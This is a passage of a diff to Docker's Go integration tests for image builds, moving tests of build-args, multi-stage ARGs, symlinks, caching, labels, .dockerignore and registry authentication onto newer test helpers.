envVal := "bar" - args := []string{ - "--build-arg", fmt.Sprintf("%s=%s", envKey, envVal), - } dockerfile := fmt.Sprintf(`FROM busybox RUN echo $%s CMD echo $%s`, envKey, envKey) - warnStr := "[Warning] One or more build-args" - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); !strings.Contains(out, warnStr) { - c.Fatalf("build completed without warning: %q %q", out, err) - } else if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - + buildImage(imgName, + cli.WithFlags("--build-arg", fmt.Sprintf("%s=%s", envKey, envVal)), + build.WithDockerfile(dockerfile), + ).Assert(c, icmd.Expected{ + Out: warnStr, + }) } func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) { testRequires(c, DaemonIsLinux) // Windows does not support ARG - args := []string{ - "build", - "--build-arg", fmt.Sprintf("FOO1=fromcmd"), - "--build-arg", fmt.Sprintf("FOO2="), - "--build-arg", fmt.Sprintf("FOO3"), // set in env - "--build-arg", fmt.Sprintf("FOO4"), // not set in env - "--build-arg", fmt.Sprintf("FOO5=fromcmd"), - // FOO6 is not set at all - "--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning - "--build-arg", fmt.Sprintf("FOO8="), // should produce a warning - "--build-arg", fmt.Sprintf("FOO9"), // should produce a warning - ".", - } - - dockerfile := fmt.Sprintf(`FROM busybox + dockerfile := `FROM busybox ARG FOO1=fromfile ARG FOO2=fromfile ARG FOO3=fromfile ARG FOO4=fromfile ARG FOO5 ARG FOO6 + ARG FO10 RUN env RUN [ "$FOO1" == "fromcmd" ] RUN [ "$FOO2" == "" ] @@ -6104,30 +4545,38 @@ func (s *DockerSuite) TestBuildBuildTimeArgEnv(c *check.C) { RUN [ "$(env | grep FOO7)" == "" ] RUN [ "$(env | grep FOO8)" == "" ] RUN [ "$(env | grep FOO9)" == "" ] - `) - - ctx, err := fakeContext(dockerfile, nil) - c.Assert(err, check.IsNil) - defer ctx.Close() - - cmd := exec.Command(dockerBinary, args...) - cmd.Dir = ctx.Dir - cmd.Env = append(os.Environ(), - "FOO1=fromenv", - "FOO2=fromenv", - "FOO3=fromenv") - out, _, err := runCommandWithOutput(cmd) - if err != nil { - c.Fatal(err, out) - } + RUN [ "$FO10" == "" ] + ` + result := buildImage("testbuildtimeargenv", + cli.WithFlags( + "--build-arg", fmt.Sprintf("FOO1=fromcmd"), + "--build-arg", fmt.Sprintf("FOO2="), + "--build-arg", fmt.Sprintf("FOO3"), // set in env + "--build-arg", fmt.Sprintf("FOO4"), // not set in env + "--build-arg", fmt.Sprintf("FOO5=fromcmd"), + // FOO6 is not set at all + "--build-arg", fmt.Sprintf("FOO7=fromcmd"), // should produce a warning + "--build-arg", fmt.Sprintf("FOO8="), // should produce a warning + "--build-arg", fmt.Sprintf("FOO9"), // should produce a warning + "--build-arg", fmt.Sprintf("FO10"), // not set in env, empty value + ), + cli.WithEnvironmentVariables(append(os.Environ(), + "FOO1=fromenv", + "FOO2=fromenv", + "FOO3=fromenv")...), + build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + ), + ) + result.Assert(c, icmd.Success) // Now check to make sure we got a warning msg about unused build-args - i := strings.Index(out, "[Warning]") + i := strings.Index(result.Combined(), "[Warning]") if i < 0 { - c.Fatalf("Missing the build-arg warning in %q", out) + c.Fatalf("Missing the build-arg warning in %q", result.Combined()) } - out = out[i:] // "out" should contain just the warning message now + out := result.Combined()[i:] // "out" should contain just the warning message now // These were specified on a --build-arg but no ARG was in the Dockerfile c.Assert(out, checker.Contains, "FOO7") @@ -6141,7 +4590,6 @@ func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) { envKey1 := "foo1" envKey2 := "foo2" envKey3 := "foo3" - args := []string{} dockerfile := fmt.Sprintf(`FROM busybox ARG %s="" ARG %s='' @@ -6154,10 +4602,7 @@ func (s *DockerSuite) TestBuildBuildTimeArgQuotedValVariants(c *check.C) { RUN [ "$%s" != "$%s" ]`, envKey, envKey1, envKey2, envKey3, envKey, envKey2, envKey, envKey3, envKey1, envKey2, envKey1, envKey3, envKey2, envKey3) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } + buildImageSuccessfully(c, imgName, build.WithDockerfile(dockerfile)) } func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { @@ -6166,7 +4611,6 @@ func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { envKey := "foo" envKey1 := "foo1" envKey2 := "foo2" - args := []string{} dockerfile := fmt.Sprintf(`FROM busybox ARG %s= ARG %s="" @@ -6174,32 +4618,96 @@ func (s *DockerSuite) TestBuildBuildTimeArgEmptyValVariants(c *check.C) { RUN [ "$%s" == "$%s" ] RUN [ "$%s" == "$%s" ] RUN [ "$%s" == "$%s" ]`, envKey, envKey1, envKey2, envKey, envKey1, envKey1, envKey2, envKey, envKey2) - - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } + buildImageSuccessfully(c, imgName, build.WithDockerfile(dockerfile)) } -func (s *DockerSuite) TestBuildBuildTimeArgDefintionWithNoEnvInjection(c *check.C) { +func (s *DockerSuite) TestBuildBuildTimeArgDefinitionWithNoEnvInjection(c *check.C) { imgName := "bldargtest" envKey := "foo" - args := []string{} dockerfile := fmt.Sprintf(`FROM busybox ARG %s RUN env`, envKey) - if _, out, err := buildImageWithOut(imgName, dockerfile, true, args...); err != nil || strings.Count(out, envKey) != 1 { - if err != nil { - c.Fatalf("build failed to complete: %q %q", out, err) - } - c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", out) + result := cli.BuildCmd(c, imgName, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Success) + if strings.Count(result.Combined(), envKey) != 1 { + c.Fatalf("unexpected number of occurrences of the arg in output: %q expected: 1", result.Combined()) } } +func (s *DockerSuite) TestBuildMultiStageArg(c *check.C) { + imgName := "multifrombldargtest" + dockerfile := `FROM busybox + ARG foo=abc + LABEL multifromtest=1 + RUN env > /out + FROM busybox + ARG bar=def + RUN env > /out` + + result := cli.BuildCmd(c, imgName, build.WithDockerfile(dockerfile)) + result.Assert(c, icmd.Success) + + result = cli.DockerCmd(c, "images", "-q", "-f", "label=multifromtest=1") + parentID := strings.TrimSpace(result.Stdout()) + + result = cli.DockerCmd(c, "run", "--rm", parentID, "cat", "/out") + c.Assert(result.Stdout(), checker.Contains, "foo=abc") + + result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "foo") + c.Assert(result.Stdout(), checker.Contains, "bar=def") +} + +func (s *DockerSuite) TestBuildMultiStageGlobalArg(c *check.C) { + imgName := "multifrombldargtest" + dockerfile := `ARG tag=nosuchtag + FROM busybox:${tag} + LABEL multifromtest=1 + RUN env > /out + FROM busybox:${tag} + ARG tag + RUN env > /out` + + result := cli.BuildCmd(c, imgName, + build.WithDockerfile(dockerfile), + cli.WithFlags("--build-arg", fmt.Sprintf("tag=latest"))) + result.Assert(c, icmd.Success) + + result = cli.DockerCmd(c, "images", "-q", "-f", "label=multifromtest=1") + parentID := strings.TrimSpace(result.Stdout()) + + result = cli.DockerCmd(c, "run", "--rm", parentID, "cat", "/out") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "tag") + + result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out") + c.Assert(result.Stdout(), checker.Contains, "tag=latest") +} + +func (s *DockerSuite) TestBuildMultiStageUnusedArg(c *check.C) { + imgName := "multifromunusedarg" + dockerfile := `FROM busybox + ARG foo + FROM busybox + ARG bar + RUN env > /out` + + result := cli.BuildCmd(c, imgName, + build.WithDockerfile(dockerfile), + cli.WithFlags("--build-arg", fmt.Sprintf("baz=abc"))) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "[Warning]") + c.Assert(result.Combined(), checker.Contains, "[baz] were not consumed") + + result = cli.DockerCmd(c, "run", "--rm", imgName, "cat", "/out") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "bar") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "baz") +} + func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) { volName := "testname:/foo" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volName = "testname:C:\\foo" } dockerCmd(c, "run", "-v", volName, "busybox", "sh", "-c", "touch /foo/oops") @@ -6208,8 +4716,9 @@ func (s *DockerSuite) TestBuildNoNamedVolume(c *check.C) { VOLUME ` + volName + ` RUN ls /foo/oops ` - _, err := buildImage("test", dockerFile, false) - c.Assert(err, check.NotNil, check.Commentf("image build should have failed")) + buildImage("test", build.WithDockerfile(dockerFile)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) } func (s *DockerSuite) TestBuildTagEvent(c *check.C) { @@ -6218,8 +4727,7 @@ func (s *DockerSuite) TestBuildTagEvent(c *check.C) { dockerFile := `FROM busybox RUN echo events ` - _, err := buildImage("test", dockerFile, false) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, "test", build.WithDockerfile(dockerFile)) until := daemonUnixTime(c) out, _ := dockerCmd(c, "events", "--since", since, "--until", until, "--filter", "type=image") @@ -6242,111 +4750,99 @@ func (s *DockerSuite) TestBuildMultipleTags(c *check.C) { FROM busybox MAINTAINER test-15780 ` - cmd := exec.Command(dockerBinary, "build", "-t", "tag1", "-t", "tag2:v2", - "-t", "tag1:latest", "-t", "tag1", "--no-cache", "-") - cmd.Stdin = strings.NewReader(dockerfile) - _, err := runCommand(cmd) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, "tag1", cli.WithFlags("-t", "tag2:v2", "-t", "tag1:latest", "-t", "tag1"), build.WithDockerfile(dockerfile)) - id1, err := getIDByName("tag1") - c.Assert(err, check.IsNil) - id2, err := getIDByName("tag2:v2") - c.Assert(err, check.IsNil) + id1 := getIDByName(c, "tag1") + id2 := getIDByName(c, "tag2:v2") c.Assert(id1, check.Equals, id2) } // #17290 func (s *DockerSuite) TestBuildCacheBrokenSymlink(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY . ./`, - map[string]string{ + COPY . ./`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink(filepath.Join(ctx.Dir, "nosuchfile"), filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) // warm up cache - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) // add new file to context, should invalidate cache err = ioutil.WriteFile(filepath.Join(ctx.Dir, "newfile"), []byte("foo"), 0644) c.Assert(err, checker.IsNil) - _, out, err := buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) - - c.Assert(out, checker.Not(checker.Contains), "Using cache") - + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + if strings.Contains(result.Combined(), "Using cache") { + c.Fatal("2nd build used cache on ADD, it shouldn't") + } } func (s *DockerSuite) TestBuildFollowSymlinkToFile(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY asymlink target`, - map[string]string{ + COPY asymlink target`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) - id, err := buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--rm", id, "cat", "target") + out := cli.DockerCmd(c, "run", "--rm", name, "cat", "target").Combined() c.Assert(out, checker.Matches, "bar") // change target file should invalidate cache err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) c.Assert(err, checker.IsNil) - id, out, err = buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Not(checker.Contains), "Using cache") + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache") - out, _ = dockerCmd(c, "run", "--rm", id, "cat", "target") + out = cli.DockerCmd(c, "run", "--rm", name, "cat", "target").Combined() c.Assert(out, checker.Matches, "baz") } func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY asymlink /`, - map[string]string{ + COPY asymlink /`), + fakecontext.WithFiles(map[string]string{ "foo/abc": "bar", "foo/def": "baz", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) - id, err := buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + out := cli.DockerCmd(c, "run", "--rm", name, "cat", "abc", "def").Combined() c.Assert(out, checker.Matches, "barbaz") // change target file should invalidate cache err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo/def"), []byte("bax"), 0644) c.Assert(err, checker.IsNil) - id, out, err = buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Not(checker.Contains), "Using cache") + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache") - out, _ = dockerCmd(c, "run", "--rm", id, "cat", "abc", "def") + out = cli.DockerCmd(c, "run", "--rm", name, "cat", "abc", "def").Combined() c.Assert(out, checker.Matches, "barbax") } @@ -6355,103 +4851,88 @@ func (s *DockerSuite) TestBuildFollowSymlinkToDir(c *check.C) { // not from the target file. func (s *DockerSuite) TestBuildSymlinkBasename(c *check.C) { name := "testbuildbrokensymlink" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY asymlink /`, - map[string]string{ + COPY asymlink /`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() - err = os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) + err := os.Symlink("foo", filepath.Join(ctx.Dir, "asymlink")) c.Assert(err, checker.IsNil) - id, err := buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - out, _ := dockerCmd(c, "run", "--rm", id, "cat", "asymlink") + out := cli.DockerCmd(c, "run", "--rm", name, "cat", "asymlink").Combined() c.Assert(out, checker.Matches, "bar") - } // #17827 func (s *DockerSuite) TestBuildCacheRootSource(c *check.C) { name := "testbuildrootsource" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(` FROM busybox - COPY / /data`, - map[string]string{ + COPY / /data`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }) - c.Assert(err, checker.IsNil) + })) defer ctx.Close() // warm up cache - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) // change file, should invalidate cache - err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) + err := ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) c.Assert(err, checker.IsNil) - _, out, err := buildImageFromContextWithOut(name, ctx, true) - c.Assert(err, checker.IsNil) + result := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) - c.Assert(out, checker.Not(checker.Contains), "Using cache") + c.Assert(result.Combined(), checker.Not(checker.Contains), "Using cache") } // #19375 +// FIXME(vdemeester) should migrate to docker/cli tests func (s *DockerSuite) TestBuildFailsGitNotCallable(c *check.C) { - cmd := exec.Command(dockerBinary, "build", "github.com/docker/v1.10-migrator.git") - cmd.Env = append(cmd.Env, "PATH=") - out, _, err := runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") + buildImage("gitnotcallable", cli.WithEnvironmentVariables("PATH="), + build.WithContextPath("github.com/docker/v1.10-migrator.git")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "unable to prepare context: unable to find 'git': ", + }) - cmd = exec.Command(dockerBinary, "build", "https://github.com/docker/v1.10-migrator.git") - cmd.Env = append(cmd.Env, "PATH=") - out, _, err = runCommandWithOutput(cmd) - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") + buildImage("gitnotcallable", cli.WithEnvironmentVariables("PATH="), + build.WithContextPath("https://github.com/docker/v1.10-migrator.git")).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "unable to prepare context: unable to find 'git': ", + }) } // TestBuildWorkdirWindowsPath tests that a Windows style path works as a workdir func (s *DockerSuite) TestBuildWorkdirWindowsPath(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildworkdirwindowspath" - - _, err := buildImage(name, ` - FROM `+WindowsBaseImage+` + buildImageSuccessfully(c, name, build.WithDockerfile(` + FROM `+testEnv.PlatformDefaults.BaseImage+` RUN mkdir C:\\work WORKDIR C:\\work RUN if "%CD%" NEQ "C:\work" exit -1 - `, true) - - if err != nil { - c.Fatal(err) - } + `)) } func (s *DockerSuite) TestBuildLabel(c *check.C) { name := "testbuildlabel" testLabel := "foo" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, cli.WithFlags("--label", testLabel), + build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo -`, false, "--label", testLabel) - - c.Assert(err, checker.IsNil) - - res := inspectFieldJSON(c, name, "Config.Labels") +`)) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) if _, ok := labels[testLabel]; !ok { c.Fatal("label not found in image") } @@ -6459,19 +4940,11 @@ func (s *DockerSuite) TestBuildLabel(c *check.C) { func (s *DockerSuite) TestBuildLabelOneNode(c *check.C) { name := "testbuildlabel" + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=bar"), + build.WithDockerfile("FROM busybox")) - _, err := buildImage(name, "FROM busybox", false, "--label", "foo=bar") - - c.Assert(err, checker.IsNil) - - res, err := inspectImage(name, "json .Config.Labels") - c.Assert(err, checker.IsNil) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) v, ok := labels["foo"] if !ok { c.Fatal("label `foo` not found in image") @@ -6483,28 +4956,18 @@ func (s *DockerSuite) TestBuildLabelCacheCommit(c *check.C) { name := "testbuildlabelcachecommit" testLabel := "foo" - if _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo - `, false); err != nil { - c.Fatal(err) - } - - _, err := buildImage(name, ` + `)) + buildImageSuccessfully(c, name, cli.WithFlags("--label", testLabel), + build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo -`, true, "--label", testLabel) - - c.Assert(err, checker.IsNil) - - res := inspectFieldJSON(c, name, "Config.Labels") + `)) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) if _, ok := labels[testLabel]; !ok { c.Fatal("label not found in image") } @@ -6516,30 +4979,19 @@ func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) { "foo": "bar", "123": "456", } - - labelArgs := []string{} - + var labelArgs []string for k, v := range testLabels { labelArgs = append(labelArgs, "--label", k+"="+v) } - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, cli.WithFlags(labelArgs...), + build.WithDockerfile(` FROM `+minimalBaseImage()+` LABEL default foo -`, false, labelArgs...) - - if err != nil { - c.Fatal("error building image with labels", err) - } - - res := inspectFieldJSON(c, name, "Config.Labels") +`)) var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Labels", &labels) for k, v := range testLabels { if x, ok := labels[k]; !ok || x != v { c.Fatalf("label %s=%s not found in image", k, v) @@ -6547,59 +4999,22 @@ func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) { } } -func (s *DockerSuite) TestBuildLabelOverwrite(c *check.C) { - name := "testbuildlabeloverwrite" - testLabel := "foo" - testValue := "bar" - - _, err := buildImage(name, ` - FROM `+minimalBaseImage()+` - LABEL `+testLabel+`+ foo -`, false, []string{"--label", testLabel + "=" + testValue}...) - - if err != nil { - c.Fatal("error building image with labels", err) - } - - res := inspectFieldJSON(c, name, "Config.Labels") - - var labels map[string]string - - if err := json.Unmarshal([]byte(res), &labels); err != nil { - c.Fatal(err) - } - - v, ok := labels[testLabel] - if !ok { - c.Fatal("label not found in image") - } - - if v != testValue { - c.Fatal("label not overwritten") - } -} - func (s *DockerRegistryAuthHtpasswdSuite) TestBuildFromAuthenticatedRegistry(c *check.C) { - dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) - + dockerCmd(c, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) baseImage := privateRegistryURL + "/baseimage" - _, err := buildImage(baseImage, ` + buildImageSuccessfully(c, baseImage, build.WithDockerfile(` FROM busybox ENV env1 val1 - `, true) - - c.Assert(err, checker.IsNil) + `)) dockerCmd(c, "push", baseImage) dockerCmd(c, "rmi", baseImage) - _, err = buildImage(baseImage, fmt.Sprintf(` + buildImageSuccessfully(c, baseImage, build.WithDockerfile(fmt.Sprintf(` FROM %s ENV env2 val2 - `, baseImage), true) - - c.Assert(err, checker.IsNil) + `, baseImage))) } func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) { @@ -6625,7 +5040,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) c.Assert(err, checker.IsNil) - dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.Username(), "-p", s.reg.Password(), privateRegistryURL) b, err := ioutil.ReadFile(configPath) c.Assert(err, checker.IsNil) @@ -6637,11 +5052,10 @@ func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) // make sure the image is pulled when building dockerCmd(c, "rmi", repoName) - buildCmd := exec.Command(dockerBinary, "--config", tmp, "build", "-") - buildCmd.Stdin = strings.NewReader(fmt.Sprintf("FROM %s", repoName)) - - out, _, err := runCommandWithOutput(buildCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "--config", tmp, "build", "-"}, + Stdin: strings.NewReader(fmt.Sprintf("FROM %s", repoName)), + }).Assert(c, icmd.Success) } // Test cases in #22036 @@ -6649,12 +5063,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option labels will always override name := "scratchy" expected := `{"bar":"from-flag","foo":"from-flag"}` - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - LABEL foo=from-dockerfile`, - true, "--label", "foo=from-flag", "--label", "bar=from-flag") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=from-flag", "--label", "bar=from-flag"), + build.WithDockerfile(`FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`)) res := inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6662,12 +5073,8 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { name = "from" expected = `{"foo":"from-dockerfile"}` - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - LABEL foo from-dockerfile`, - true) - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + LABEL foo from-dockerfile`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6676,12 +5083,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option label will override even via `FROM` name = "new" expected = `{"bar":"from-dockerfile2","foo":"new"}` - _, err = buildImage(name, - `FROM from - LABEL bar from-dockerfile2`, - true, "--label", "foo=new") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=new"), + build.WithDockerfile(`FROM from + LABEL bar from-dockerfile2`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6691,12 +5095,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // will be treated as --label foo="", --label bar="" name = "scratchy2" expected = `{"bar":"","foo":""}` - _, err = buildImage(name, - `FROM `+minimalBaseImage()+` - LABEL foo=from-dockerfile`, - true, "--label", "foo", "--label", "bar=") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo", "--label", "bar="), + build.WithDockerfile(`FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6707,12 +5108,9 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // This time is for inherited images name = "new2" expected = `{"bar":"","foo":""}` - _, err = buildImage(name, - `FROM from - LABEL bar from-dockerfile2`, - true, "--label", "foo=", "--label", "bar") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=", "--label", "bar"), + build.WithDockerfile(`FROM from + LABEL bar from-dockerfile2`)) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6721,11 +5119,8 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option labels with only `FROM` name = "scratchy" expected = `{"bar":"from-flag","foo":"from-flag"}` - _, err = buildImage(name, - `FROM `+minimalBaseImage(), - true, "--label", "foo=from-flag", "--label", "bar=from-flag") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "foo=from-flag", "--label", "bar=from-flag"), + build.WithDockerfile(`FROM `+minimalBaseImage())) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) @@ -6734,31 +5129,22 @@ func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { // Command line option labels with env var name = "scratchz" expected = `{"bar":"$PATH"}` - _, err = buildImage(name, - `FROM `+minimalBaseImage(), - true, "--label", "bar=$PATH") - c.Assert(err, check.IsNil) - + buildImageSuccessfully(c, name, cli.WithFlags("--label", "bar=$PATH"), + build.WithDockerfile(`FROM `+minimalBaseImage())) res = inspectFieldJSON(c, name, "Config.Labels") if res != expected { c.Fatalf("Labels %s, expected %s", res, expected) } - } // Test case for #22855 func (s *DockerSuite) TestBuildDeleteCommittedFile(c *check.C) { name := "test-delete-committed-file" - - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN echo test > file RUN test -e file RUN rm file - RUN sh -c "! test -e file"`, false) - if err != nil { - c.Fatal(err) - } + RUN sh -c "! test -e file"`)) } // #20083 @@ -6775,13 +5161,14 @@ func (s *DockerSuite) TestBuildDockerignoreComment(c *check.C) { RUN sh -c "(ls -la /tmp/#1)" RUN sh -c "(! ls -la /tmp/#2)" RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (ls /tmp/dir1/foo)"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "foo", - "foo2": "foo2", - "dir1/foo": "foo in dir1", - "#1": "# file 1", - "#2": "# file 2", - ".dockerignore": `# Visual C++ cache files + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("foo", "foo"), + build.WithFile("foo2", "foo2"), + build.WithFile("dir1/foo", "foo in dir1"), + build.WithFile("#1", "# file 1"), + build.WithFile("#2", "# file 2"), + build.WithFile(".dockerignore", `# Visual C++ cache files # because we have git ;-) # The above comment is from #20083 foo @@ -6791,15 +5178,7 @@ foo2 #1 # The following is not considered as comment as # is not at the beginning #2 -`, - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } +`))) } // Test case for #23221 @@ -6807,13 +5186,9 @@ func (s *DockerSuite) TestBuildWithUTF8BOM(c *check.C) { name := "test-with-utf8-bom" dockerfile := []byte(`FROM busybox`) bomDockerfile := append([]byte{0xEF, 0xBB, 0xBF}, dockerfile...) - ctx, err := fakeContextFromNewTempDir() - c.Assert(err, check.IsNil) - defer ctx.Close() - err = 